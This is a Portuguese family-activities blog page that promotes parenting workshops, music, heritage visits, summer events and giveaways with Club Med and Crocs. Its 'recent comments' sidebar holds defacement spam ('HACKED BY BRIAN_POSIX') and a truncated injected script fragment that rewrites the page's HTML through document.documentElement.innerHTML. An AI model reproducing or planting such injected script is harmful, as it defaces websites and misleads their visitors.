Nunca como hoje foi tão difícil educar os filhos. A correria do dia a dia, a falta de tempo, dinheiro e disponibilidade, fazem com que esta função - crucial para a vida - se torne cada vez mais difícil de desenvolver. Nos múltiplos papéis e funções que adquirem nos dias que correm, os pais assumem quase o papel de super heróis.

 

Descubra ideias e serviços que ajudam e facilitam a missão de educar: uma agenda de pais com sugestões de ações de formação com diferentes temas educativos para reforço dos laços familiares, diversas soluções para ajuda em casa, e locais onde pode deixar as suas crianças em segurança fora dos horários habituais,potenciando momentos a sós para namorar, divertir-se ou simplesmente descontrair!

 

Estes são apenas alguns exemplos de ideias e serviços que os pais encontram disponíveis no nosso site http://estrelaseouricos.familia.sapo.pt/
e facebook www.faceboo.com/estrelaseouricos.

 

Veja o vídeo aqui!


Tags:

É fundamental a estruturação de uma literacia musical desde os primeiros anos de vida, pelo que, os pais e educadores devem promover o contacto com a música de uma forma regular. Deve-se proporcionar às crianças o contacto com as rimas infantis constantes nos elementos musicais e nas canções de embalar, com a música ao vivo e os sons dos instrumentos, mas também com a música gravada para escutar, dançar ou simplesmente imaginar. Percorrer mundos sonoros, reportórios distintos, incluindo saberes novos e saberes antigos, é fundamental para abrir o leque do conhecimento e experiências na infância. Mas a presença da música gravada não substitui a audição da música ao vivo, e por isso é fundamental as crianças e jovens assistirem regularmente a musicais, concertos comentados e participarem em oficinas de exploração musical. Sugerimos 4 atividades para viver a música em família!

 

No nosso site http://estrelaseouricos.familia.sapo.pt/ e facebook www.faceboo.com/estrelaseouricos encontra muitas outras sugestões de atividades tendo a música como mote!

 

Veja o vídeo aqui!


Tags:

O início de um novo ano escolar propicia medos e ansiedades! O medo de começar novas tarefas, de fracassar, de conhecer novos amigos, de passar mais tempo afastado dos pais após as férias de verão são apenas alguns dos exemplos.
O medo faz parte do processo evolutivo e existe na criança e no adulto. Cabe ao adulto criar estratégias para a criança conseguir lidar e ultrapassar os seus medos.
Neste programa descubra como as atividades/visitas ao Património podem ser uma boa estratégia para atingir esse fim, ou seja, as experiências vividas nos lugares, escolhidas em função de um medo específico, podem quebrar o gelo e dar o mote ao diálogo.
Descubra aqui 4 ideias para explorar 4 medos: Terror, Água, Escuro e Morte.
A ideia está lançada, depois cabe a cada pai/adulto, nas etapas de desenvolvimento da criança, perceber os medos e adequar, explorando em família as diversas atividades que propomos no nosso site. http://estrelaseouricos.familia.sapo.pt/ e facebook.
A metamorfose do medo - é o desafio!


Tags:

Se há local especial, que os miúdos adoram e onde se podem aprender sempre coisas novas sobre fauna e flora e ainda passar bons momentos em família é o Jardim Zoológico de Lisboa.
Não admira por isso que seja (re)visitado todos os anos por milhares de pessoas de dentro e de fora do nosso país.
Dedicamos por isso esta nossa rubrica a este equipamento que tem uma série de vertentes e serviços a pensar nos tempos livres das crianças e em actividades em famílias.
Diariamente colocamos novas notícias – de oficinas, cursos, espetáculos, exposições, teatro, cinema, etc - no nosso site http://estrelaseouricos.familia.sapo.pt/ e facebook.

Gozem da melhor maneira das vossas férias de verão!


Tags:

Nas férias de Verão o que apetece é estar à beira mar ou beira rio e não faltam oportunidades para que isso aconteça de norte a sul do país, continente e ilhas.
Para além do puro prazer de desfrutar da paisagem, há eventos e actividades de tempos livres para os miúdos e famílias que decorrem nesta altura do ano mesmo em cima da praia.
Lembrámo-nos, por isso, de reunir sugestões de actividades costeiras que estão disponíveis nos próximos meses de Verão, mas diariamente colocamos novas notícias – de espetáculos, teatro, cinema, cursos, etc - no nosso site http://estrelaseouricos.familia.sapo.pt/ e facebook.

Não há desculpas para não usufruir da maravilhosa costa do nosso país!

Passatempo: "Algarve em família"– Temos para oferecer 1 estadia de 2 noites, para uma família de 4 pessoas (2 adultos + 2 crianças) no Club Med Balaia. A estadia será para usufruir entre o dia 15 de Setembro 2012 e o dia 4 de Novembro de 2012.

Desfrute mais em família este verão no Club Med da Balaia. Um resort com tudo incluído, especialmente preparado para receber famílias com crianças para umas férias verdadeiramente inesquecíveis. Requinte e exclusividade, com conforto, excelente gastronomia e uma grande variedade de atividades desportivas para grandes e pequenos. No Club Med, os pais podem contar com um enquadramento profissional para os seus filhos. Serviços e enquadramento para os bebés, actividades desportivas ou artísticas para os adolescentes, um novo conceito inspirado na natureza. Para cada faixa etária, encontrará espaços adaptados com pessoal especializado.

Como participar: Vá ao site: estrelaseouricos.sapo complete criativamente a seguinte frase: "No Club Med tenho umas férias de sonho porque..."
Vencedores: A frase mais criativa.
Data de Vigência: 3 de setembro de 2012 às 00h
Este passatempo resulta de uma parceria entre a Estrelas e Ouriços e Club Med.


Tags:

Esta semana acabam as aulas.
Foi um ano letivo com muitas novidades e pensamos que tanto alunos, como professores estão de parabéns pelo seu esforço e trabalho desenvolvido.
A pensar neste período de final do ano trazemos três temas para esta rubrica: o reconhecimento do trabalho dos professores, atividades de férias e a necessidade de inscrição atempada em atividades extra-curriculares para o próximo ano letivo.

Lembramos que no nosso site temos uma série de notícias sobre férias que decorrem de norte a sul do país – campos de férias que “obrigam” a dormida e atividades para ocupar os miúdos apenas durante o dia.

Diariamente, colocamos novas notícias – de espetáculos, teatro, cinema, cursos, etc - no nosso ite http://estrelaseouricos.familia.sapo.pt/ e facebook. Não há desculpas para que não façam nada ao fim de semana!


Tags:

Estamos praticamente no final do ano letivo e no bom período para os festivais. Já está bom tempo e depois de um ano de aulas, apetece a todos descontrair e desfrutar de bons espetáculos.

Para o programa trazemos sugestões de diferentes tipos de festivais, com temáticas, locais, e públicos-alvo bem diferentes. Em comum têm o serem exteriores, a aproveitar o bom tempo que se faz sentir, e de terem como principal público alvo crianças, jovens e famílias.

Lembrem-se que, diariamente, colocamos novas notícias – de espetáculos, teatro, cinema, cursos, etc - no nosso site http://estrelaseouricos.familia.sapo.pt/ e facebook para que possam escolher atividades para os tempos livres e férias de Verão dos vossos filhos.
Estamos praticamente no final do ano letivo e no bom período para os festivais. Já está bom tempo e depois de um ano de aulas, apetece a todos descontrair e desfrutar de bons espetáculos.


Tags:

A tradição já não é o que era; os espaços naturais e museológicos muitas vezes são recriados e transformados e são palco de iniciativas bem diferentes do que tradicionalmente existia. Hora do conto na praia, teatro no centro comercial, danças no castelo ou aulas de xadrez no museu são alguns exemplos de atividades que decorrem em “locais improváveis”.

Se consultarem o nosso site http://estrelaseouricos.familia.sapo.pt/ irão surpreender-se com outros exemplos semelhantes, mas seleccionámos algumas iniciativas para o programa, que esperamos sejam do vosso agrado.
Lembrem-se que, diariamente, colocamos novas notícias no nosso site e facebook para que possam escolher a melhor maneira de passarem bons momentos em família.


Tags:

Amanhã é o Dia Internacional da Família, que para nós tem grande significado. As famílias estão na base do nosso projeto, que tem como principal objetivo proporcionar informação relevante e suficiente para tenham bons momentos juntos, dentro ou fora de casa, durante todo o ano e em qualquer ponto do país.

Se consultarem o nosso site http://estrelaseouricos.familia.sapo.pt/ ficarão surpreendidos, com a quantidade de sugestões de atividades, notícias de eventos, artigos informativos para os pais, etc. Diariamente fazemos a edição de notícias em vários meios e múltiplas plataformas, para que, de forma dinâmica, possamos informar os pais dos assuntos que lhes interessam.

Para este programa trazemos sugestões que vão ao encontro de necessidades e desejos das famílias, mas aconselhamos a consulta do nosso site e do facebook, onde podem encontrar centenas de propostas fantásticas para passarem bem os vossos dias.


Tags:

Decidimos abrir uma nova área no nosso roteiro «Agenda de Pais» exatamente no mês em que se comemora o Dia da Família (dia 15 de Maio). Na verdade, temos verificado uma crescente oferta e procura de (in)formação sobre questões de parentalidade e decidimos criar uma área editorial para atividades neste âmbito.

De norte a sul do país há cada vez mais iniciativas pontuais e regulares que vão ao encontro desta procura de informação e pensamos que são conteúdos que interessam ao nosso público. Não são apenas workshops, mas também palestras, feiras, cursos, oficinas, etc.

É claro que não esquecemos que no próximo domingo se comemora o Dia da Mãe, mas a nossa sugestão é irem ao nosso site http://estrelaseouricos.familia.sapo.pt/ , atualizado diariamente, onde há notícia de muitas formas para celebrarem da melhor maneira este dia.

PASSATEMPO: Temos para oferecer 15 PARES DE TÉNIS CROCS (Menina: Sneackers Hello Kitty; Menino: Slip On Kids Cars)

Líder mundial em calçado inovador para homem, mulher e criança a Crocs Inc. oferece várias colecçoes que incluem mais de 250 estilos para todas as ocasiões.
O calçado Crocs™ proporciona um conforto e suporte profundos para qualquer ocasião e estação do ano. Todos os sapatos Crocs™ incluem Croslite™, um material único, uma tecnologia revolucionária que produz sapatos leves, cómodos, resistentes ao odor e que se adaptam ao pé.
Os produtos Crocs™ são vendidos em mais de 90 países. Todos os dias, milhões de fans de sapatos Crocs em todo o Mundo desfrutam da forma, funcionalidade, versatilidade destes produtos no trabalho, na escola ou enquanto brincam.

Como participar: Vá ao site: estrelaseouricos.sapo e complete criativamente a seguinte frase - «Andar calçado com uns Crocs é como…» Indique também se está a concorrer para ténis de menino ou menina.
Vencedores: 15 ténis: 7 pares de menina "Sneaker Hello Kitty" e 8 pares de menino "Slip On Kids Cars" dos números 23 ao 30/31.
Data de Vigência: Até dia 29 de Maio
Este passatempo resulta de uma parceria entre a Estrelas e Ouriços e a CROCS Inc.


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO